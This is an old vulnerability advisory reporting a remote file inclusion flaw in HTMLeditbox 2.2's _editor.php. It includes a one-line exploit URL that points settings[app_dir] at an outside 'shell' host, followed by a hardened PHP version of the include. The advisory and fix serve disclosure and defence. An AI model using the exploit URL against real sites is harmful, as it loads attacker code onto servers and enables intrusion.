HTMLeditbox & 2.2 >> RFI
Apr 25 2007 10:52AM
alijsb yahoo com
+++++++
name & version :HTMLeditbox & 2.2
vendor: http://www.labs4.com
by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru
bug :
_editor.php @include($settings[app_dir].'/inc/config.php');
exploit :
http://victim/_editor.php?settings[app_dir]=http://shell
++++++
Copyright 2010, SecurityFocus
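A hardened form of the include quoted in the post, as an added example that is not part of the original post or the vendor's code. It assumes the request shown works because $settings is uninitialised when _editor.php runs and request parameters reach global scope (for example via register_globals); APP_ROOT and resolve_config_path() are hypothetical names.

```php
<?php
declare(strict_types=1);
// Added example, not labs4.com code. APP_ROOT and resolve_config_path()
// are hypothetical names; the directory layout is an assumption.
// php.ini should also keep allow_url_include = Off.

// Assumption: the application directory is fixed at deploy time.
define('APP_ROOT', __DIR__);

/**
 * Return the canonical path of inc/config.php under $appDir, or null when
 * $appDir is not a local directory inside APP_ROOT.
 */
function resolve_config_path($appDir): ?string
{
    // Rejects arrays (settings[app_dir][]=x), empty values and NUL bytes.
    if (!is_string($appDir) || $appDir === '' || strpos($appDir, "\0") !== false) {
        return null;
    }
    // realpath() only resolves local files, so http://, ftp:// and other
    // stream-wrapper values come back as false.
    $real = realpath($appDir . '/inc/config.php');
    $root = realpath(APP_ROOT);
    if ($real === false || $root === false) {
        return null;
    }
    // The resolved file must sit below APP_ROOT (blocks ../ traversal).
    $prefix = $root . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $real;
}

// Initialise $settings before use so request input imported into global
// scope cannot pre-seed it.
$settings = ['app_dir' => APP_ROOT];

$config = resolve_config_path($settings['app_dir']);
if ($config === null) {
    http_response_code(500);
    exit('configuration not found');
}
// No @ operator: a failed include should be logged, not silenced.
require $config;
```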